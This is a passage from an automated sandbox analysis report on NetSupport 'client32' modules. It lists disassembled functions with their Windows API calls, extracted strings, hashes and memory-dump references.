                                                                                                                                        • Opcode Fuzzy Hash: 889e2c9f85ea8016a32cb5deea05d580a90b4bcc58e6bc18f7868a3592ec7294
                                                                                                                                        • Instruction Fuzzy Hash: 6A71EAB1B00309AFE711DBA4CC85FE9F7B5BB88704F0084A9E3159B281EB70B944CB65
                                                                                                                                        Function 11030444 Relevance: 28.4, APIs: 11, Strings: 5, Instructions: 357libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 11030450
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 11030457
                                                                                                                                        • GetNativeSystemInfo.KERNEL32(?), ref: 11030465
                                                                                                                                        • GetStockObject.GDI32(0000000D), ref: 11030672
                                                                                                                                        • GetObjectA.GDI32(00000000,0000003C,?), ref: 11030682
                                                                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C0
                                                                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C6
                                                                                                                                        • InterlockedExchange.KERNEL32(02378DB8,00001388), ref: 11030746
                                                                                                                                        • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 11030778
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorModeObject$AddressExchangeHandleInfoInterlockedModuleNativeProcStockSystem
                                                                                                                                        • String ID: .%d$Error %s unloading audiocap dll$GetNativeSystemInfo$kernel32.dll$pcicl32
                                                                                                                                        • API String ID: 711497182-3782231422
                                                                                                                                        • Opcode ID: 106fb8bc483957a45cfa904f75695c57fc0a23e7e1dbb6dc441bbb2ace021997
                                                                                                                                        • Instruction ID: f63cb038d00ac44cf3594e94df0c2f2de2f1e5b42f8671348dba24db1a15b590
                                                                                                                                        • Opcode Fuzzy Hash: 106fb8bc483957a45cfa904f75695c57fc0a23e7e1dbb6dc441bbb2ace021997
                                                                                                                                        • Instruction Fuzzy Hash: 59D172B0D16369DEDF02CBB48C447EDBEF5AB8430CF1001A6D849A7289F7755A84CB92
                                                                                                                                        Function 110302A9 Relevance: 28.4, APIs: 9, Strings: 7, Instructions: 350registryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 1113F670: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,?,76938400,?,?,111417CF,00000000,CSDVersion,00000000,00000000,?), ref: 1113F690
                                                                                                                                        • RegCloseKey.KERNEL32(?), ref: 110303C3
                                                                                                                                        • GetStockObject.GDI32(0000000D), ref: 11030672
                                                                                                                                        • GetObjectA.GDI32(00000000,0000003C,?), ref: 11030682
                                                                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C0
                                                                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C6
                                                                                                                                        • InterlockedExchange.KERNEL32(02378DB8,00001388), ref: 11030746
                                                                                                                                        • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 11030778
                                                                                                                                          • Part of subcall function 111601FD: __isdigit_l.LIBCMT ref: 11160222
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorModeObject$CloseExchangeInterlockedQueryStockValue__isdigit_l
                                                                                                                                        • String ID: .%d$3$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$Error %s unloading audiocap dll$pcicl32
                                                                                                                                        • API String ID: 3298063328-2190704750
                                                                                                                                        • Opcode ID: 0368fc6ba5d118a56a23de13d07dfbd221bb1150da24c248aa16321da6633758
                                                                                                                                        • Instruction ID: 9f43229105984b1126c86cbd82377d9c7f2924e853b9011d381d79a7883068f9
                                                                                                                                        • Opcode Fuzzy Hash: 0368fc6ba5d118a56a23de13d07dfbd221bb1150da24c248aa16321da6633758
                                                                                                                                        • Instruction Fuzzy Hash: E0D1F8B0D163599FEB11CBA48C84BAEFBF5AB8430CF1041E9D449A7288FB715A44CB52
                                                                                                                                        Function 689033A0 Relevance: 27.6, APIs: 2, Strings: 16, Instructions: 571COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: wsprintf
                                                                                                                                        • String ID: %s:%s$*GatewayAddress$*PINServer$*UseWebProxy$*WebProxy$:%d$Gateway$Gateway_UseWebProxy$Gateway_WebProxy$P$PinProxy$ProxyCred$ProxyPassword$ProxyUsername$UsePinProxy$client247
                                                                                                                                        • API String ID: 2111968516-2157635994
                                                                                                                                        • Opcode ID: 05ae1cdb36dcba4c5c5e59d05f4c1d966c9c281825f63852be7726969dee5ac9
                                                                                                                                        • Instruction ID: 8a82afb8f24d933412636874f05d629eae6ad4827dbe6e245a1133ec756b8fe8
                                                                                                                                        • Opcode Fuzzy Hash: 05ae1cdb36dcba4c5c5e59d05f4c1d966c9c281825f63852be7726969dee5ac9
                                                                                                                                        • Instruction Fuzzy Hash: 622286B2A04368AFDB20CBA8CC80EEEB7BDAB49304F8485DDE55967540D6319F85CF51
                                                                                                                                        Function 11084F50 Relevance: 26.5, APIs: 8, Strings: 7, Instructions: 218libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(PCIINV.DLL,A0A8B03E,02616A48,02616A38,?,00000000,1117ED9C,000000FF,?,11031392,02616A48,00000000,?,?,?), ref: 11084F85
                                                                                                                                          • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                          • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
                                                                                                                                          • Part of subcall function 1110C520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,7736C3F0,?,1110D1BD,00000000,00000001,?,?,?,000000FF,?,11026F57), ref: 1110C53E
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetInventory), ref: 11084FAB
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,Cancel), ref: 11084FBF
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetInventoryEx), ref: 11084FD3
                                                                                                                                        • wsprintfA.USER32 ref: 1108505B
                                                                                                                                        • wsprintfA.USER32 ref: 11085072
                                                                                                                                        • wsprintfA.USER32 ref: 11085089
                                                                                                                                        • CloseHandle.KERNEL32(00000000,11084DB0,00000001,00000000), ref: 110851DA
                                                                                                                                          • Part of subcall function 11084BC0: CloseHandle.KERNEL32(?,7622F550,?,?,11085200,?,11031392,02616A48,00000000,?,?,?), ref: 11084BD8
                                                                                                                                          • Part of subcall function 11084BC0: CloseHandle.KERNEL32(?,7622F550,?,?,11085200,?,11031392,02616A48,00000000,?,?,?), ref: 11084BEB
                                                                                                                                          • Part of subcall function 11084BC0: CloseHandle.KERNEL32(?,7622F550,?,?,11085200,?,11031392,02616A48,00000000,?,?,?), ref: 11084BFE
                                                                                                                                          • Part of subcall function 11084BC0: FreeLibrary.KERNEL32(00000000,7622F550,?,?,11085200,?,11031392,02616A48,00000000,?,?,?), ref: 11084C11
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseHandlewsprintf$AddressProc$Library$CreateEventFreeLoad_memset
                                                                                                                                        • String ID: %s_HF.%s$%s_HW.%s$%s_SW.%s$Cancel$GetInventory$GetInventoryEx$PCIINV.DLL
                                                                                                                                        • API String ID: 3281479988-2492245516
                                                                                                                                        • Opcode ID: 31bc0f0ac908e73c9262357e0f29979773ffb83f4654f2e723ad6fc38f51b4df
                                                                                                                                        • Instruction ID: 32114b85bd35150ab9ff672105bee8b4aca5606f1db728b838d963d94260b1c4
                                                                                                                                        • Opcode Fuzzy Hash: 31bc0f0ac908e73c9262357e0f29979773ffb83f4654f2e723ad6fc38f51b4df
                                                                                                                                        • Instruction Fuzzy Hash: 8271B1B5E0470AABEB11CF79CC45BDAFBE5EB48304F10456AE95AD72C0EB71A500CB91
                                                                                                                                        Function 1102FF34 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 176synchronizationlibraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • OpenMutexA.KERNEL32(001F0001,?,PCIMutex), ref: 11030073
                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,PCIMutex,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1103008C
                                                                                                                                        • GetProcAddress.KERNEL32(?,SetProcessDPIAware), ref: 11030109
                                                                                                                                        • SetLastError.KERNEL32(00000078,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1103011F
                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000001F4,?,?,?,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1103014E
                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1103015B
                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 11030166
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1103016D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseHandleMutex$AddressCreateErrorFreeLastLibraryObjectOpenProcSingleWait
                                                                                                                                        • String ID: /247$PCIMutex$SOFTWARE\Policies\NetSupport\Client\standard$SetProcessDPIAware$_debug\trace$_debug\tracefile$istaUI
                                                                                                                                        • API String ID: 2061479752-1320826866
                                                                                                                                        • Opcode ID: de79c64c3cbc319c321437111ac499bab6d77cae53018e637abb465631a425fd
                                                                                                                                        • Instruction ID: 54878425dae39cfb29a1127824abcf245d41d7cdbe78275a25fd6106d4eefb26
                                                                                                                                        • Opcode Fuzzy Hash: de79c64c3cbc319c321437111ac499bab6d77cae53018e637abb465631a425fd
                                                                                                                                        • Instruction Fuzzy Hash: 1851FB74E1131B9FDB11DB61CC88B9EF7B49F84709F1044A8E919A3285FF706A40CB62
                                                                                                                                        Function 11027E10 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 130librarysynchronizationCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000102), ref: 11027E61
                                                                                                                                          • Part of subcall function 11080BE0: _strrchr.LIBCMT ref: 11080BEE
                                                                                                                                        • wsprintfA.USER32 ref: 11027E84
                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 11027EC9
                                                                                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 11027EDD
                                                                                                                                        • wsprintfA.USER32 ref: 11027F01
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 11027F17
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 11027F20
                                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002), ref: 11027F81
                                                                                                                                        • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 11027F95
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Handle$CloseModulewsprintf$CodeExitFileLibraryLoadNameObjectProcessSingleWait_strrchr
                                                                                                                                        • String ID: "$Locales\%d\$SetClientResLang called, gPlatform %x$Setting resource langid=%d$\GetUserLang.exe"$pcicl32_res.dll
                                                                                                                                        • API String ID: 512045693-1744591295
                                                                                                                                        • Opcode ID: 0c549729b7108691d0ef4b476a02272bb4edcc2e78ff917f042e0d38bced481d
                                                                                                                                        • Instruction ID: 42811afe57253d3bd896070464278dee24b8baf42e1d510c4721ed0fe76631d9
                                                                                                                                        • Opcode Fuzzy Hash: 0c549729b7108691d0ef4b476a02272bb4edcc2e78ff917f042e0d38bced481d
                                                                                                                                        • Instruction Fuzzy Hash: 7A41E874E04229ABD710CF69CCC5FEAF7B9EB44708F4081A9F95997244DBB0A940CFA0
                                                                                                                                        Function 11131260 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 101windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 11141AB0: _memset.LIBCMT ref: 11141AF5
                                                                                                                                          • Part of subcall function 11141AB0: GetVersionExA.KERNEL32(?), ref: 11141B0E
                                                                                                                                          • Part of subcall function 11141AB0: LoadLibraryA.KERNEL32(kernel32.dll), ref: 11141B35
                                                                                                                                          • Part of subcall function 11141AB0: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 11141B47
                                                                                                                                          • Part of subcall function 11141AB0: FreeLibrary.KERNEL32(00000000), ref: 11141B5F
                                                                                                                                          • Part of subcall function 11141AB0: GetSystemDefaultLangID.KERNEL32 ref: 11141B6A
                                                                                                                                        • AdjustWindowRectEx.USER32(1113DE08,00CE0000,00000001,00000001), ref: 111312A7
                                                                                                                                        • LoadMenuA.USER32(00000000,000003EC), ref: 111312B8
                                                                                                                                        • GetSystemMetrics.USER32(00000021), ref: 111312C9
                                                                                                                                        • GetSystemMetrics.USER32(0000000F), ref: 111312D1
                                                                                                                                        • GetSystemMetrics.USER32(00000004), ref: 111312D7
                                                                                                                                        • GetDC.USER32(00000000), ref: 111312E3
                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 111312EE
                                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 111312FA
                                                                                                                                        • CreateWindowExA.USER32(00000001,NSMWClass,02600AC8,00CE0000,80000000,80000000,1113DE08,?,00000000,?,11000000,00000000), ref: 1113134F
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,110F58A9,00000001,1113DE08,_debug), ref: 11131357
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: System$Metrics$LibraryLoadWindow$AddressAdjustCapsCreateDefaultDeviceErrorFreeLangLastMenuProcRectReleaseVersion_memset
                                                                                                                                        • String ID: Fs$CreateMainWnd, hwnd=%x, e=%d$NSMWClass$mainwnd ht1=%d, ht2=%d, yppi=%d
                                                                                                                                        • API String ID: 1594747848-4184434473
                                                                                                                                        • Opcode ID: f79aa2a339231c942e312d8c047aaa8dcd578a5d72aad0640aa64dc35281c2a5
                                                                                                                                        • Instruction ID: c1c99cb922432dc138ba9c202a31cb7aa0d0c26f00a3c7d74779ab3f3301680f
                                                                                                                                        • Opcode Fuzzy Hash: f79aa2a339231c942e312d8c047aaa8dcd578a5d72aad0640aa64dc35281c2a5
                                                                                                                                        • Instruction Fuzzy Hash: 51318371E00219AFDB109FE58C85FBFFBB8EB88704F204528FA11F7284D67469408BA5
                                                                                                                                        Function 1102C030 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 238synchronizationCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 1110C340: SetEvent.KERNEL32(00000000), ref: 1110C364
                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102C075
                                                                                                                                        • GetTickCount.KERNEL32 ref: 1102C09A
                                                                                                                                          • Part of subcall function 110CE440: __strdup.LIBCMT ref: 110CE45A
                                                                                                                                        • GetTickCount.KERNEL32 ref: 1102C194
                                                                                                                                          • Part of subcall function 110CF0A0: wvsprintfA.USER32(?,?,1102C131), ref: 110CF0CB
                                                                                                                                          • Part of subcall function 110CE4F0: _free.LIBCMT ref: 110CE51D
                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102C28C
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 1102C2A8
                                                                                                                                        Strings
